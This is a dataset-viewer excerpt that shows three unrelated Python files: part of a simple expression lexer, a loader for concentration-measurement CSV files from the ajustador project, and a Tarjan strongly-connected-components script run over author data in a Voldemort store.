def __init__(self, items):
self.items = split(items)
self.index = 0
self.item = ''
self.stringOn = False
self.stringList = ''
self.intOn = False
# Identifies correct token type
def identify(self):
ints = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
tok = ''
val = self.item
if '"' == self.item or "'" == self.item:
if self.stringOn:
self.stringOn = False
tok = 'STRING'
val = self.getString()
else:
self.stringOn = True
elif self.stringOn:
self.addToString()
elif self.item in ' \n':
pass
elif '+' == self.item:
tok = 'PLUS'
elif '-' == self.item:
tok = 'MINUS'
elif '*' == self.item:
tok = 'MUL'
elif '/' == self.item:
tok = 'DIV'
elif '(' == self.item:
tok = 'LPAREN'
elif ')' == self.item:
tok = 'RPAREN'
else:
if self.item in ints:
tok = 'INT'
else:
tok = 'ERROR'
token = Token(tok, val)
return token.addToList()
# Moves forward a character
def advance(self):
self.item = self.items[self.index]
self.index += 1
# Displays list of token value pairs
def displayAll(self):
removeEmptyStrings(tokenList)
return tokenList
# Adds an item to a string
def addToString(self):
self.stringList += self.item
# Returns string and clears it
def getString(self):
temp = self.stringList
self.stringList = ''
return temp
class Error:
def __init__(self, error, detail, code, line, fileName):
self.error = error
self.detail = detail
self.code = code
self.line = line
self.file = fileName
# Displays errors
def display(self):
return f'File "{self.file}", line {str(self.line)}\n {self.code}\n{self.error}: {self.detail}'
# Runs needed methods
def run(text):
wordList = split(text)
l1 = Lexer(text)
for word in wordList:
l1.advance()
l1.identify()
print(l1.displayAll())
tokenList.clear() |
498 | 20649decd3ff21b1aa814d0a04180195cac3629b | #loadconc.py - possibly these classes will be added to ajustador/loader.py when ready
# -*- coding:utf-8 -*-
from __future__ import print_function, division
import numpy as np
from ajustador import xml,nrd_fitness
import glob
import os
import operator
msec_per_sec=1000
nM_per_uM=1000
nM_per_mM=1e6
class trace(object):
def __init__(self, molname, x, y,stim_time):
molname_parts=molname.split()
self.molname=molname_parts[0]
self.norm=False
if len(molname_parts)>1:
self.units=molname_parts[1]
if '%' in self.units:
self.norm=True
if len(molname_parts)>2:
#strip out any trailing non-numeric characteris
self.scale=int(''.join([c for c in molname_parts[2] if c.isdigit()]))
else:
self.scale=1
else:
self.units='nM'
self.scale=1
if self.units.startswith('m') or self.units.startswith('(m'):
yvalue=y*nM_per_mM
elif self.units.startswith('u') or self.units.startswith('(u'):
yvalue=y*nM_per_uM
else:
#assume nM (or percent if fret)
yvalue=y
self.wave=np.rec.fromarrays((x, yvalue), names='x,y')
#calculate features: baseline, peaktime, peak value
start_index,basal=nrd_fitness.basal(x,yvalue,stim_time)
self.exp_basal=basal
pt,peak=nrd_fitness.peak(x,yvalue,start_index)
self.features={'basal':basal, 'stim_pt': start_index,'peaktime':pt,'peakval': peak}
class CSV_conc(object):
"""Load a series of concentration measurements from a CSV file
Each CSV file contains data for one or more molecules:
Time time_units, mol_name1 (nM), [mol_name2]
read time_units (sec,msec,min allowed) and convert to msec
"""
def __init__(self, fname,rootname,stim_time,features=[]):
import pandas as pd
model_num=xml.modelname_to_param(fname,rootname)
self.name=os.path.basename(fname)[0:os.path.basename(fname).rfind('.')]
self.injection=model_num
self.features=features
csv = pd.read_csv(fname, index_col=0)
x_head=csv.index.name.split()
if len(x_head)>1:
time_units=x_head[-1]
if time_units.startswith('sec') or time_units.startswith('(sec'):
time_factor=msec_per_sec
elif time_units.startswith('min') or time_units.startswith('(min'):
time_factor=msec_per_sec*60 #sec_per_min
else:
time_factor=1
print('x column header: {}, time_units: {}, conversion factor: {}'.format(x_head,time_units,time_factor))
else:
time_factor=1
x = csv.index.values*time_factor #time values
#may want to read units of y value, e.g. allow uM or mM and convert to nM
self.waves = {col.split()[0]:trace(col, x, csv[col].values,stim_time) for col in csv.columns}
class CSV_conc_set(object):
#set of files, each one a CSV_conc object, differing in stim protocol
def __init__(self,rootname,stim_time=0,features=[]):
self.stim_time=stim_time*msec_per_sec
self.features=features
if os.path.isdir(rootname): #if directory, look for all csv files
dirname = rootname
filenames=glob.glob(rootname+'/*.csv')
self.name=rootname
else:
if rootname.endswith('.csv'):
#case with single filename specified
filenames=[rootname]
else:
#case with a set of filenames specified, with common "prefix" + variable "suffix"
filenames=glob.glob(rootname+'*.csv')
dirname = os.path.dirname(rootname)
self.name=os.path.basename(rootname)
print('CSV_conc_set:',self.name, 'dir',dirname,'files',filenames,'stim_start (ms)', self.stim_time)
if len(filenames)==0:
print('**************** CSV_conc_set: NO FILES FOUND **************************')
csv_list=[CSV_conc(fn,rootname,self.stim_time,features) for fn in filenames]
csv_list.sort(key=operator.attrgetter('injection'))
self.data=csv_list
|
499 | bb2c684fd5b962c97c033d4b4c2027d52b7371fd | import voldemort
import time
authorStore = voldemort.StoreClient('authorStore', [{'0', 6666}])
stack = []
components = []
index = 1
# Implementation of the Tarjan algorithm for the detection of strongly connected components.
# Function collects all authors in the database and outputs them as strongly connected components.
def tarjan():
timer = time.time
start = timer()
voldemortResult = authorStore.get("_authors")
allAuthors = voldemortResult[0][0]
nodes = {}
for author in allAuthors.get("content"):
nodeKey = str(author)
nodeValue = [authorStore.get(nodeKey)[0][0], -1, -1, False]
#node = Liste aus den Autorendaten, index(int), lowlink(int), onStack(boolean)
nodes[nodeKey] = nodeValue
for nodeKey in nodes:
node = nodes.get(nodeKey)
if node[1] == -1:
strongconnect(node, nodes)
end = timer()
for scc in components:
print("==> NEUE KOMPONENTE")
for node in scc:
print("Index: " + str(node[1]) + ", Lowlink: " + str(node[2]) + ", Name: " + node[0].get('name'))
print("Insgesamt sind es " + str(len(components)) + " Komponenten")
print("Laufzeit: " + str(end - start) + " Sekunden")
# This method connects every node in the graph and builds, if applicable, a strongly connected component out of them.
def strongconnect(node, allNodes):
global index
node[1] = index
node[2] = index
index += 1
stack.append(node)
node[3] = True
for kanteKey in node[0].get("friends"):
kanteNode = allNodes.get(str(kanteKey))
if kanteNode[1] == -1:
strongconnect(kanteNode, allNodes)
node[2] = min(node[2], kanteNode[2])
elif kanteNode[3] == True:
node[2] = min(node[2], kanteNode[1])
if node[1] == node[2]:
scc = []
prevNode = None
while prevNode != node:
prevNode = stack.pop()
prevNode[3] = False
scc.append(prevNode)
components.append(scc)
tarjan() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.